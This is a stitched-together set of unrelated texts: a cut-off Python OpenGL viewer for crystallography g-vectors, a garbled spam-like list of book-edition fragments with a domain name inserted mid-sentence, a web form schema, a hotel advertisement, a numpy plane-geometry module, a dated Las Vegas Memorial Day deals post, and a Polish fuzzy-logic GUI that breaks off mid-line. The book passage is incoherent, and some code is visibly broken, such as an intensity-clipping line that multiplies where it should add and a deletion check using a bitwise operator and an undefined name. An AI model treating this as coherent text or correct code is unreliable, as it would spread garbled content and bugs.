self.near, self.far) GL.glMatrixMode(GL.GL_MODELVIEW) self.redraw(self) GL.glFlush() # Tidy up GL.glPopMatrix() # Restore the matrix # self.tk.call(self._w, 'swapbuffers') self.tkSwapBuffers() class plot3d(Tk.Toplevel): def __init__(self,parent,data=None,lines=None, ubis=None,image=None,pars=None,spline=None): """ Data would be your observed g-vectors. Lines will be a computed lattice """ Tk.Toplevel.__init__(self,parent) self.parent=parent if data is not None: xyz=data.copy() else: xyz=numpy.array([0,0,0]) self.ps=Tk.StringVar() self.ps.set('1.') self.pointsize=1. self.npeaks=xyz.shape[0] self.o = myOpengl(self, width = 400, height = 400) self.o.redraw = self.redraw self.o.autospin_allowed = 1 self.o.fovy=5 self.o.near=1e6 self.o.far=1e-6 import math self.o.distance=3. #numpy.maximum.reduce(numpy.ravel(xyz))*4 / \ # math.tan(self.o.fovy*math.pi/180) print(type(xyz),xyz.dtype.char,xyz.shape) self.xyz=xyz f=Tk.Frame(self) Tk.Button(f,text="Help",command=self.o.help).pack(side=Tk.LEFT) Tk.Button(f,text="Reset",command=self.o.reset).pack(side=Tk.LEFT) Tk.Button(f,text="Pointsize",command=self.setps).pack(side=Tk.LEFT) Tk.Entry(f,textvariable=self.ps).pack(side=Tk.LEFT) Tk.Button(f,text="Quit",command=self.goaway).pack(side=Tk.RIGHT) self.dataoff=0 self.o.pack(side = 'top', expand = 1, fill = 'both') f.pack(side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X) Tk.Label(self,text="Red=[1,0,0] Green=[0,1,0] Blue=[0,0,1]").pack( side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X) self.ubis=ubis self.color=numpy.ones((xyz.shape[0],3),numpy.float) print(self.color.shape) self.tex=False if ubis is not None: self.ubis = self.readubis(ubis) self.scorecolor(0) if pars is not None: self.tex=True self.readspline(spline) self.readprms(pars) self.readimage(image) self.after(100, self.changedata) def readspline(self,spline): from ImageD11 import blobcorrector self.corrector = blobcorrector.correctorclass(spline) def readubis(self,ubis): from ImageD11 import indexing return indexing.readubis(ubis) def readprms(self,prms): from ImageD11 import parameters o = parameters.parameters() o.loadparameters(prms) self.pars=o.get_parameters() def readimage(self,image): from ImageD11 import transform from fabio import openimage self.imageobj=openimage.openimage(image) # map from 2048x2048 to 1024x1024 d = self.imageobj.data.astype(numpy.float32) mi= d.mean() - d.std()*2 mx= d.mean() * d.std()*2 shape=self.imageobj.data.shape d=numpy.reshape(numpy.clip(self.imageobj.data,mi,mx),shape) # makes a clipped copy d=(255.*(d-mi)/(mx-mi)) # scale intensity print(d.min(),d.max(),d.mean()) self.image=numpy.zeros((1024,1024),numpy.uint8) if d.shape==(2048,2048): # rebin 2x2 im=(d[::2,::2]+d[::2,1::2]+d[1::2,::2]+d[1::2,1::2])/4 self.image=(255-im).astype(numpy.uint8).tostring() self.imageWidth=1024 self.imageHeight=1024 # make a 2D array of x,y p=[] pk=[] step = 64 r=[ [ 0,0 ], [0,step], [step,step], [step,0] ] for i in range(0,1024,step): for j in range(0,1024,step): # i,j 1024x1024 texture coords # x,y spatially corrected for v in r: pk.append([i+v[0],j+v[1]]) x,y = self.corrector.correct((i+v[0])*2 , (j+v[1])*2) # corrected p.append([x,y]) p=numpy.array(p).T pk=numpy.array(pk).T omega=float(self.imageobj.header['Omega']) self.pars['distance']=float(self.pars['distance'])*1000 tth,eta=transform.compute_tth_eta(p,**self.pars) gve = transform.compute_g_vectors(tth,eta,omega*self.pars['omegasign'],self.pars['wavelength']) self.pts = [] print("Setting up image mapping",p.shape,gve.shape) for i in range(pk.shape[1]): self.pts.append([pk[1,i]/1024.,pk[0,i]/1024.,gve[0,i],gve[1,i],gve[2,i]]) #for p in self.pts: # print p self.setupTexture() def setupTexture(self): GL.glDisable(GL.GL_TEXTURE_2D) GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1) GL.glTexImage2D(GL.GL_TEXTURE_2D,#target 0,#level 3,#internalformat self.imageWidth, self.imageHeight, 0,#border GL.GL_LUMINANCE,#format GL.GL_UNSIGNED_BYTE,# type self.image) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_CLAMP) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_CLAMP) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST) GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_DECAL) GL.glEnable(GL.GL_TEXTURE_2D) GL.glEnable(GL.GL_NORMALIZE) GL.glShadeModel(GL.GL_FLAT) def scorecolor(self,i=0): cc = [ [ 1,0,0] , [0,1,0] , [0,0,1], [1,1,0], [1,0,1], [0,1,1], [ 0.5,0,0] , [0,0.5,0] , [0,0,0.5], [0.5,0.5,0], [0.5,0,0.5], [0,0.5,0.5]] if self.ubis is not None: from ImageD11 import indexing for u,i in zip(self.ubis,list(range(len(self.ubis)))): scores=indexing.calc_drlv2(u,self.xyz) print(self.xyz.shape,scores.shape) ind = numpy.compress( numpy.less(scores,0.02) , numpy.arange(self.xyz.shape[0]) ) print("Grain",i,scores.shape,ind.shape) for j in range(3): c=numpy.ones(self.color.shape[0]) numpy.put(c,ind,cc[i%len(cc)][j]) self.color[:,j]*=c def go(self): """ Allow the toplevel to return a handle for changing data """ self.o.mainloop() def goaway(self): print("Called goaway") self.o.destroy() self.destroy() if self.parent is None: sys.exit() print("Ought to be gone now...") def changedata(self,xyz=None): if xyz is not None: self.xyz=xyz.copy() self.npeaks=xyz.shape[0] GL.glDisableClientState(GL.GL_VERTEX_ARRAY) GL.glDisableClientState(GL.GL_COLOR_ARRAY) GL.glVertexPointer( 3, GL.GL_FLOAT, 0, self.xyz.astype(numpy.float32).tostring() ) GL.glColorPointer( 3, GL.GL_FLOAT, 0, self.color.astype(numpy.float32).tostring() ) GL.glEnableClientState(GL.GL_VERTEX_ARRAY) GL.glEnableClientState(GL.GL_COLOR_ARRAY) self.o.tkRedraw() def setps(self): self.pointsize=float(self.ps.get()) self.o.tkRedraw() def redraw(self,o): GL.glDisable(GL.GL_LIGHTING) GL.glClearColor(0., 0., 0., 0) GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT) GL.glColor3f(1.0, 1.0, 1.0) # white GL.glPointSize(self.pointsize) GL.glDrawArrays(GL.GL_POINTS, 0, self.npeaks ) if self.ubis is not None and len(self.ubis)==1: hkl = numpy.dot(numpy.linalg.inv(self.ubis[0]), numpy.identity(3,numpy.float)).T # print hkl else: hkl = numpy.identity(3,numpy.float) # print hkl GL.glBegin(GL.GL_LINE_LOOP) GL.glColor3f(1.0, 0.0, 0.0) # red GL.glVertex3f(0.,0.,0.) GL.glVertex3f(hkl[0][0],hkl[0][1],hkl[0][2]) GL.glEnd() GL.glBegin(GL.GL_LINE_LOOP) GL.glColor3f(0.0, 1.0, 0.0) # green GL.glVertex3f(0.,0.,0.) GL.glVertex3f(hkl[1][0],hkl[1][1],hkl[1][2]) GL.glEnd() GL.glBegin(GL.GL_LINE_LOOP) GL.glColor3f(0.0, 0.0, 1.0) # blue GL.glVertex3f(0.,0.,0.) GL.glVertex3f(hkl[2][0],hkl[2][1],hkl[2][2]) GL.glEnd() if self.tex: # print "drawing images" GL.glEnable(GL.GL_TEXTURE_2D) GL.glColor4f(.0, 1.0, .0, 1.0) # red GL.glBegin(GL.GL_QUADS) # generate a grid of squares to map the texture in 3D # opengl has better "map" methods to do this for i,j,g1,g2,g3 in self.pts: # print i,j,g1,g2,g3 GL.glTexCoord2f(i,j) GL.glVertex3f(g1, g2, g3) GL.glEnd() # GL.glDisable(GL.GL_TEXTURE_2D) GL.glFlush() GL.glEnable(GL.GL_LIGHTING) if __name__=="__main__": try: lines=open(sys.argv[1],"r").readlines() except: print("Usage %s gvector_file [ubifile] [image parfile]"%(sys.argv[0])) raise # sys.exit() on=0 xyz=[] for line in lines: if on==1: try: vals=[float(x) for x in line.split()] xyz.append( [ vals[0],vals[1],vals[2] ]) except: pass if line.find("xr yr zr")>0 or line.find("gx gy gz ")>0: on=1 xyz=numpy.array(xyz) if len(xyz) == 0 and lines[0][0]=="#": from ImageD11 import columnfile c = columnfile.columnfile( sys.argv[1] ) xyz = numpy.array( (c.gx, c.gy, c.gz )).T npeaks = len(xyz) if len(sys.argv)==3: o=plot3d(None,data=xyz,ubis=sys.argv[2]) elif len(sys.argv)==6: o=plot3d(None,data=xyz,ubis=sys.argv[2],image=sys.argv[3],pars=sys.argv[4],spline=sys.argv[5]) else: o=plot3d(None,data=xyz,ubis=None) def runit(): o.changedata(o.xyz) o.after(100, runit ) o.mainloop()
Young Adult Science Fiction and Fantasy author: Analects for an Autobiography Nearly all creators of Utopia have resembled the man who has toothache, and therefore thinks happiness consists in not having toothache. Tubb, others Mary Wollstonecraft Shelley Index to at least 11 publications Michael Scott Twenty signed numbered portfolios of the illustrations were issued separately. Gidget ABC, —66a beach comedy about an energetic year-old playing in the California sun; F Troop ABC, —67which offered up an assortment of Native American stereotypes in a comedy set at a military fort in the post-Civil War West; I Dream of Jeannie NBC, —70a comedy about the relationship between an astronaut and a beautiful, voluptuous 2,year-old genie; and My Mother the Car NBC, —66which delivered just what its title promised. Signed by Edward Steichen. Signed by Raul Rosarivo and Alberto Kraft. The following week, on Oct. Issued with no illustrations. Signed by Robert Quackenbush. Signed by George Jones. Signed by Fletcher Martin. Signed by the author and by Fletcher Martin. Signed by David Knight. Part 2 - copies. Signed by Charles Raymond. Griffiths, David O'Brien, E. Signed by Imre Reiner. Signed by William Moyes. Signed by May Neama. Leonard, William Ellery translator. Le Sage, Alain Rene. Signed by David Knight. Signed by Virgil Burnett. Signed by Mimi Korach. Signed by Mariette Lydis. Some day, they might be found by another civilization. Four volumes, issued in two installments. The Unconscious by definition is what you are not conscious of. Signed by the author and Janusz Kapusta. Illustrated and signed by Hans Alexander Mueller. This habit always confines and cramps up our knowledge. Although he believed it was likely that there is intelligent life on other worlds, he was relentlessly skeptical about claims that the earth is being visited by UFOs.How to Read a Book is a book by Mortimer polonyauniversitem.com co-authored a heavily revised edition in with Charles Van Doren, which gives guidelines for critically reading good and great books of any polonyauniversitem.com revision, in addition to the first edition, treats genres (poetry, history, science, fiction, et cetera), inspectional and syntopical reading. Fulfillment by Amazon (FBA) is a service we offer sellers that lets them store their products in Amazon's fulfillment centers, and we directly pack, ship, and provide customer service for these products. These are some of the many databases available to you as a member of Middletown Thrall Library: Artemis (now Gale Literary Sources) Searches the following databases (described below): Literature Criticism Online, Literature for Students, Literature Resource Center, and Something about the Author. guide & complete checklist, or bibliography of all books published by the limited editions club: - Archives and past articles from the Philadelphia Inquirer, Philadelphia Daily News, and polonyauniversitem.com (Whether it's called narrative nonfiction, literary nonfiction, long-form journalism, creative nonfiction, or narrative journalism — true stories, well-written and compelling).
from colander import Length from deform import Button from deform.widget import HiddenWidget, Select2Widget, TextAreaWidget from ekklesia_common.contract import Form, Schema, enum_property, int_property, string_property from ekklesia_common.translation import _ from ekklesia_portal.enums import VoteByUser class PropositionNoteSchema(Schema): proposition_id = string_property(title=_('proposition_id'), missing=None) user_id = int_property(title=_('user_id'), missing=None) notes = string_property(title=_('notes'), validator=Length(min=0, max=2048), missing=None) vote = enum_property(VoteByUser, title=_('vote'), missing=VoteByUser.UNSURE) class PropositionNoteForm(Form): def __init__(self, request, action): super().__init__(PropositionNoteSchema(), request, action, buttons=[Button(title=_("submit"))]) def prepare_for_render(self, items_for_selects): self.set_widgets({ 'proposition_id': HiddenWidget(), 'user_id': HiddenWidget(), 'notes': TextAreaWidget(rows=8, missing=None), 'vote': Select2Widget(values=items_for_selects['vote']) })
Located at 68th Avenue North in Myrtle Beach, Monteray Bay Suites is right on the beach and in close proximity to many of the most exciting attractions, shopping destinations, and dining establishments in the city. Just a five mile drive from visitor-favorites like Broadway at the Beach, the Myrtle Beach Boardwalk, and the Tanger Outlet Mall, Monteray Bay offers you superb location and fabulous amenities. As an oceanfront resort, Monteray Bay provides easy beach access for all guests, so you can spend as much time as you'd like on the sandy shores of the Myrtle Beach coast. Stay cool in the summer by taking a dip in the outdoor, oceanfront pool, featuring lounge chairs and relaxing pool deck. Experience the fun of the indoor pool area, where you can find kiddie pool areas, lazy river, and hot tub as well! You can even take your swimming to new heights with the exquisite roof-top pool. Finally, a cardio center, featuring treadmills, elliptical machines, and weight station, is available for guest use. Monteray Bay offers guests numerous amenities, fantastic ocean views, and beach access, all while in an area central to all of the most-loved attractions in Myrtle Beach.
# -*- coding: utf-8 -*- """ Provide functions for the creation and manipulation of Planes. Planes are represented using a numpy.array of shape (4,). The values represent the plane equation using the values A,B,C,D. The first three values are the normal vector. The fourth value is the distance of the plane from the origin, down the normal. .. seealso: http://en.wikipedia.org/wiki/Plane_(geometry) .. seealso: http://mathworld.wolfram.com/Plane.html """ from __future__ import absolute_import, division, print_function import numpy as np from math3 import vector from math3.utils import all_parameters_as_numpy_arrays, parameters_as_numpy_arrays def create(normal=None, distance=0.0, dtype=None): """Creates a plane that runs along the X,Y plane. It crosses the origin with a normal of 0,0,1 (+Z). :rtype: numpy.array :return: A plane that runs along the X,Y plane. """ if normal is None: normal = [0.0, 0.0, 1.0] return np.array([normal[0], normal[1], normal[2], distance], dtype=dtype) @parameters_as_numpy_arrays('vector1', 'vector2', 'vector3') def create_from_points(vector1, vector2, vector3, dtype=None): """Create a plane from 3 co-planar vectors. The vectors must all lie on the same plane or an exception will be thrown. The vectors must not all be in a single line or the plane is undefined. The order the vertices are passed in will determine the normal of the plane. :param numpy.array vector1: a vector that lies on the desired plane. :param numpy.array vector2: a vector that lies on the desired plane. :param numpy.array vector3: a vector that lies on the desired plane. :raise ValueError: raised if the vectors are co-incident (in a single line). :rtype: numpy.array :return: A plane that contains the 3 specified vectors. """ dtype = dtype or vector1.dtype # make the vectors relative to vector2 relV1 = vector1 - vector2 relV2 = vector3 - vector2 # cross our relative vectors normal = np.cross(relV1, relV2) if np.count_nonzero(normal) == 0: raise ValueError("Vectors are co-incident") # create our plane return create_from_position(position=vector2, normal=normal, dtype=dtype) @parameters_as_numpy_arrays('position', 'normal') def create_from_position(position, normal, dtype=None): """Creates a plane at position with the normal being above the plane and up being the rotation of the plane. :param numpy.array position: The position of the plane. :param numpy.array normal: The normal of the plane. Will be normalised during construction. :rtype: numpy.array :return: A plane that crosses the specified position with the specified normal. """ dtype = dtype or position.dtype # -d = a * px + b * py + c * pz n = vector.normalise(normal) d = -np.sum(n * position) return create(n, d, dtype) def create_xy(invert=False, distance=0., dtype=None): """Create a plane on the XY plane, starting at the origin with +Z being the up vector. The distance is the distance along the normal (-Z if inverted, otherwise +Z). """ invert = -1. if invert else 1. return np.array([0., 0., 1. * invert, distance]) def create_xz(invert=False, distance=0., dtype=None): """Create a plane on the XZ plane, starting at the origin with +Y being the up vector. The distance is the distance along the normal (-Y if inverted, otherwise +Y). """ invert = -1. if invert else 1. return np.array([0., 1. * invert, 0., distance]) def create_yz(invert=False, distance=0., dtype=None): """Create a plane on the YZ plane, starting at the origin with +X being the up vector. The distance is the distance along the normal (-X if inverted, otherwise +X). """ invert = -1. if invert else 1. return np.array([1. * invert, 0., 0., distance]) def invert_normal(plane): """Flips the normal of the plane. The plane is **not** changed in place. :rtype: numpy.array :return: The plane with the normal inverted. """ # flip the normal, and the distance return -plane def position(plane): """Extracts the position vector from a plane. This will be a vector co-incident with the plane's normal. :param numpy.array plane: The plane. :rtype: numpy.array :return: A valid position that lies on the plane. """ return plane[:3] * plane[3] def normal(plane): """Extracts the normal vector from a plane. :param numpy.array plane: The plane. :rtype: numpy.array :return: The normal vector of the plane. """ return plane[:3].copy()
Vegas Values: Thanking Our Troops ‘N More! Weekend-long party May 27-30 includes UFC 130 viewing on Saturday, May 28. Food & drink specials range include two tacos, a Tecate draft and a shot of tequila for $20. Complimentary admission to resort pools May 27-30. Live DJs, 2-for-1 drink voucher with valid military ID. “Holly’s World” star Angel Porrino and son Roman host Family Fun Memorial Day Weekend May 27-31. Mandalay Bay The Go-Go’s concert on the beach, May 27, tickets are $27.50. Rok Vegas at NYNY hosts Vanilla Ice May 28, doors at 10pm, $20+ men, $10+ women. Nina Blackwood’s Absolutely 80s Summer Music Fest begins Memorial Day Weekend. Free concert by Terri Nunn & Berlin, May 28 at 9pm. “Holly’s World” co-star Laura Croft hosts bikini fashion show on May 29. Marquee Dayclub at Cosmopolitan welcomes Fatboy Slim May 29, doors at 10am $60 men, $20 women. Jubilee!, the longest-running show on the Las Vegas Strip, has an ongoing two-for-one ticket discount. Comedian George Wallace is offering free show tickets throughout the month of May. Comedian Vinnie Favorito has an ongoing half price ticket offer. Flamingo Spa is offering 20% off all spa treatments. Defending the Caveman is offering free show tickets, up to two per veteran throughout the month of May. Additional tickets can be purchased at a two-for-one discount. Legends in Concert has an ongoing half price ticket offer. Harrah’s Spa is offering 20% off all spa treatments. The over-the-top production of Frank Marino’s Divas Las Vegas, has an ongoing half price ticket offer. Matsuri, “the Strip’s biggest afternoon show” is offering a $10 general admission ticket and $15 VIP ticket through Memorial Day. Imperial Palace Spa is offering 20% off all spa treatments. Hypnotist Anthony Cools has an ongoing two-for-one ticket discount. Rio Spa & Salon is offering 30% off all spa treatments. Cravings is offering a complimentary buffet for all active duty and retired military personnel with ID. Saturday, May 28 and Sunday, May 29 only. Terry Fator 40% discount with military ID. Military discount ranges from 20% to 50%, depending on show. Call 702-792-7777 for more details. Outstanding line-up of activities this weekend! I called Mirage to confirm the buffet offer just 20 mins. ago. The buffet manager told me he had no idea what I was talking about and there are not offering any discounts or free meal for veterans. Too bad. Charlene, Thanks for the update — Unfortunately, Kellee wrote this article in 2011 and lots of things can change in our town in two years!
#!/usr/bin/env python3 """ author: Kamil Cukrowski, 2016 """ from tkinter import * import tkinter import tkinter.ttk from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg import matplotlib.pyplot as plt from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg import numpy as np import inference import fuzzy_sets from matplotlib import cm import random class guiOnButtonDefuzyfikacja(tkinter.Tk): def __init__(self, parent): self.parent = parent def show(self, frame): self.frame = frame self.parent.resetFrame(frame) ## interfere_functext = self.convertInferenceFuncToText(self.parent.ruleset.inference_func) ## f = Frame(frame) f.place(in_=frame, anchor="c", relx=.5, rely=.5) ## l=tkinter.Label(f, text='Deffuzifikacja aktualna: '+interfere_functext, justify=LEFT) l.grid(row=0,column=0,columnspan=3) ## tkinter.Label(f, text='Ustaw deffuzifikacje: ').grid(row=1,column=0) list=['COG','LOM','MOM','FOM'] inference_func = StringVar() inference_func.set(interfere_functext) tkinter.OptionMenu(f,inference_func,*list).grid(row=1,column=1) ## b=tkinter.Button(f, text="Ustaw", command= lambda: self.OnButtonRegulyOdswierz(inference_func.get())) b.grid(row=1,column=2) def OnButtonRegulyOdswierz(self,text): self.parent.ruleset.inference_func = self.convertTextToInferenceFunc(text) self.show(self.frame) def convertTextToInferenceFunc(self, text): if ( text == 'COG' ): return inference.cog if ( text == 'MOM' ): return inference.mom if ( text == 'LOM' ): return inference.lom if ( text == 'FOM' ): return inference.fom raise ValueError('unexistent inference function : '+text) def convertInferenceFuncToText(self, inference_func): if ( inference_func == inference.cog ): return 'COG' if ( inference_func == inference.mom ): return 'MOM' if ( inference_func == inference.lom ): return 'LOM' if ( inference_func == inference.fom ): return 'FOM' raise ValueError('unexistent inference function : '+inference_func) class guiOnButtonReguly(tkinter.Tk): def __init__(self, parent): self.parent = parent def show(self, frame): self.parent.resetFrame(frame) self.frame = frame ## frame.update() top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50) top.pack(side=TOP, fill=BOTH, expand=True) b1 = Frame(frame, width = frame.winfo_width(), height = 20) b1.pack(side=BOTTOM, fill=X) b1.pack_propagate(False) b2 = Frame(frame, width = frame.winfo_width(), height = 20) b2.pack(side=BOTTOM, fill=X) b2.pack_propagate(False) ## tkinter.Label(top, text='Reguły:').pack() view = Frame(top) view.pack(fill=BOTH, expand=True) S = Scrollbar(view) T = Text(view, width=1000) S.pack(side=RIGHT, fill=BOTH, expand=True) T.pack(side=LEFT, fill=BOTH, expand=True) S.config(command=T.yview) T.config(yscrollcommand=S.set) self.T = T self.refreshText() ## tkinter.Label(b1, text='Usuń regułę numer: ').pack(side=LEFT) e = StringVar(); e.set('1'); tkinter.Entry(b1, textvariable=e).pack(side=LEFT) tkinter.Button(b1, text='usuń', command= lambda: self.onButtonUsunRegule(e)).pack(side=LEFT) ## tkinter.Label(b2, text='Jeśli prędkość jest ').pack(side=LEFT) v1 = self.addOptionMenu(b2, self.parent.dom_predkosc); tkinter.Label(b2, text=' i widocznosc jest ').pack(side=LEFT) v2 = self.addOptionMenu(b2, self.parent.dom_widocznosc); tkinter.Label(b2, text=' i przyczepnosc jest ').pack(side=LEFT) v3 = self.addOptionMenu(b2, self.parent.dom_przyczepnosc); tkinter.Label(b2, text=' to ryzyko jest ').pack(side=LEFT) v4 = self.addOptionMenu(b2, self.parent.dom_ryzyko); tkinter.Button(b2, text='dodaj regułę',command= lambda: self.onButtonDodajRegule(v1.get(),v2.get(),v3.get(),v4.get())).pack(side=LEFT) def refreshText(self): self.T.delete("1.0", END) self.T.insert(END, self.rulesString()) def addOptionMenu(self, frame, domain): list_=[] for fuzzyset in domain.fuzzy_sets: list_.append(fuzzyset.name) var = StringVar() var.set(list_[0]) tkinter.OptionMenu(frame,var,*list_).pack(side=LEFT) return var def onButtonDodajRegule(self, predkosc, widocznosc, przyczepnosc, ryzyko): self.parent.ruleset.add_rule_in_order([predkosc,widocznosc,przyczepnosc,ryzyko]) self.refreshText() def onButtonUsunRegule(self, entry): num = int(entry.get()); if num < 1 | num > len(ruleset.rules): return del self.parent.ruleset.rules[num-1] self.refreshText() def rulesString(self): ruleset = self.parent.ruleset string="" for j in range(len(ruleset.rules)): rule = ruleset.rules[j] string += '%2d'%(j+1)+". Jeśli " for i in range(len(ruleset.domains)-1): string += ruleset.domains_list[i].linguistic_name+" jest "+rule.input_sets[i].name + " i " string = string[:-3]; # remove last ' i ' i=-1; string += " to "+ruleset.domains_list[i].linguistic_name+" jest "+rule.output_set.name+'\n'; return string class guiOnButtonFPrzynaleznosci(tkinter.Tk): def __init__(self, parent): self.parent = parent ## self.fuzzyName = "" self.fuzzyNameList = "" ## self.fuzzyTypeList=[] for type in ['trójkątna', 'prostokątna', 'trapezowa', 'Guassa']: self.fuzzyTypeList.append(type) self.fuzzyType = StringVar() self.fuzzyType.set(self.fuzzyTypeList[0]) ## self.values=[] for i in [0,1,2,3]: e = StringVar() e.set('0') self.values.append( e ) def show(self, frame, dom): self.frame = frame self.dom = dom ## self.parent.resetFrame(frame) ## self.fuzzyNameList=[] for fuzzyset in dom.fuzzy_sets: self.fuzzyNameList.insert(0,fuzzyset.name) self.fuzzyName = StringVar() self.fuzzyName.set(self.fuzzyNameList[0]) ## frame.update() top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50) top.pack(side=TOP, fill=BOTH) top.pack_propagate(False) bottom = Frame(frame, width = frame.winfo_width(), height = 50) bottom.pack(side=BOTTOM, fill=BOTH) top.pack_propagate(False) # nasz plot fig = plt.Figure(figsize=(15,15), dpi=60) subplot = fig.add_subplot(1,1,1) dom.addPlotsToSubplot(subplot) canvas = FigureCanvasTkAgg(fig, top) toolbar = NavigationToolbar2TkAgg(canvas, top) toolbar.pack(side=TOP, fill=BOTH) canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH) # i dziubki do edycji! tkinter.Label(bottom,text="Funkcja do edycji:").grid(column=0,row=0) tkinter.OptionMenu(bottom,self.fuzzyName,*self.fuzzyNameList).grid(column=0,row=1) tkinter.Label(bottom,text="Kształt funkcji").grid(column=1,row=0) tkinter.OptionMenu(bottom,self.fuzzyType,*self.fuzzyTypeList).grid(column=1,row=1) tkinter.Label(bottom,text="Wartości punktów").grid(column=2,row=0,columnspan=5) for i in range(0,len(self.values)): tkinter.Entry(bottom, textvariable=self.values[i], width=5).grid(column=2+i,row=1) b=tkinter.Button(bottom, text="Odśwież", command= lambda: self.onButtonFPrzynaleznosciOdswierz(dom, self.fuzzyName.get(), self.fuzzyType.get(), self.values)) b.grid(column=7,row=1) def refresh(self): return self.show(self.frame, self.dom) def onButtonFPrzynaleznosciOdswierz(self, dom, fuzzyName, fuzzyType, values): val = [] for i in range(0, len(values)): try: val.append( float(values[i].get()) ) except ValueError: print("Bad input") return old_set = dom.get_set(fuzzyName) if fuzzyType == 'trójkątna': f_set = fuzzy_sets.TriangleSet(old_set.range_min, val[0], val[1], val[2], old_set.range_max, old_set.name) if fuzzyType == 'prostokątna': f_set = fuzzy_sets.RectangleSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name) if fuzzyType == 'trapezowa': f_set = fuzzy_sets.TrapezoidSet(old_set.range_min, val[0], val[1], val[2], val[3], old_set.range_max, old_set.name) if fuzzyType == 'Guassa': f_set = fuzzy_sets.GaussSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name) dom.change_set(fuzzyName, f_set) self.refresh() class guiOnButtonPlaszczyznaSterowan(tkinter.Tk): def __init__(self, parent): self.parent = parent def show(self, frame): frame.update() top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50) top.pack(side=TOP, fill=BOTH) top.pack_propagate(False) bottom = Frame(frame, width = frame.winfo_width(), height = 50) bottom.pack(side=BOTTOM, fill=Y) bottom.pack_propagate(False) ## tkinter.Label(bottom, text='Przyczepność: ').pack(side=LEFT) tmp = self.parent.dom_przyczepnosc.fuzzy_sets[0] scale = tkinter.Scale(bottom, from_=tmp.range_min, to=tmp.range_max, resolution=(tmp.range_max-tmp.range_min)/500, orient=HORIZONTAL) scale.pack(fill=X, expand=True, side=LEFT) tkinter.Button(bottom, text='Rysuj', command= lambda: self.refreshPlot(top, scale.get())).pack(side=LEFT) ## l=tkinter.Label(top, text=( "Aby narysować wykres,\n" "ustaw parametr przyczepność i wciśnij przycisk 'Rysuj'\n" "\n" "Generacja wykresu może trochę potrwać!\n")) l.pack(fill=BOTH, expand=True, anchor=CENTER) def refreshPlot(self, frame, przyczepnosc): # draw 3d graph of 2 rule input 1 rule output num_gridpoints = 25 vels = np.linspace(self.parent.dom_predkosc.fuzzy_sets[0].range_min, self.parent.dom_predkosc.fuzzy_sets[0].range_max, num_gridpoints) viss = np.linspace(self.parent.dom_widocznosc.fuzzy_sets[0].range_min, self.parent.dom_widocznosc.fuzzy_sets[0].range_max, num_gridpoints) vels, viss = np.meshgrid(vels, viss) risks = np.ones((num_gridpoints, num_gridpoints)) inference = self.parent.ruleset.inference for x in range(num_gridpoints): for y in range(num_gridpoints): risks[x, y] = inference([vels[x][y], viss[x][y], przyczepnosc]) fig = plt.figure(figsize=(15,15), dpi=60) fig.canvas.set_window_title('Wykres 3D dla przyczepności = '+'%.2f'%przyczepnosc) ax = fig.add_subplot(111,projection="3d") ax.set_xlabel("Prędkość [km/h]") ax.set_ylabel("Widoczność [km]") ax.set_zlabel("Prawdopodobieństwo wypadku [%]") ax.set_zlim([self.parent.dom_ryzyko.fuzzy_sets[0].range_min, self.parent.dom_ryzyko.fuzzy_sets[0].range_max]); ax.plot_surface(vels, viss, risks, rstride=1, cstride=1, cmap=cm.coolwarm) fig.show() plt.show() #~ self.parent.resetFrame(frame) #~ canvas = FigureCanvasTkAgg(fig, frame) #~ toolbar = NavigationToolbar2TkAgg(canvas, frame) #~ toolbar.pack(side=TOP, fill=BOTH) #~ canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH) class guiOnButtonGeneratorLiczb(): def __init__(self,parent): self.parent = parent; self.predkosc = StringVar(); self.widocznosc = StringVar(); self.przyczepnosc = StringVar(); self.ryzyko = StringVar(); self.debug = StringVar(); def show(self, inframe): frame = tkinter.Frame(inframe); frame.place(in_=inframe, anchor="c", relx=.5, rely=.5); tkinter.Label(frame,text="Wyznacz wyjście dla wejść:\n").grid(column=0, row=0, columnspan=2) tkinter.Label(frame,text="Prędkość ").grid(column=0, row=1) tkinter.Entry(frame, textvariable=self.predkosc).grid(column=1, row=1) tkinter.Label(frame,text="Widoczność ").grid(column=0, row=2) tkinter.Entry(frame, textvariable=self.widocznosc).grid(column=1, row=2) tkinter.Label(frame,text="Przyczepność ").grid(column=0, row=3) tkinter.Entry(frame, textvariable=self.przyczepnosc).grid(column=1, row=3) tkinter.Label(frame,text="Prawdopodobieństwo wypadku ").grid(column=0, row=4) tkinter.Entry(frame, textvariable=self.ryzyko).grid(column=1, row=4) tkinter.Label(frame,text="\n").grid(column=0, row=5) b=tkinter.Button(frame, text="Wygeneruj losowe wartości", command=self.onButtonWygeneruj) b.grid(column=0, row=6) b=tkinter.Button(frame,text="Wyznacz", command=self.onButtonWyznacz) b.grid(column=1, row=6) tkinter.Label(frame,textvariable=self.debug).grid(column=0, row=8,columnspan=2) def myRandrange(self, fuzzy_set): return round(fuzzy_set.range_min+random.random()*fuzzy_set.range_max, 3); def onButtonWygeneruj(self): fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0]; self.predkosc.set( self.myRandrange(fuzzy_set) ); fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0]; self.widocznosc.set( 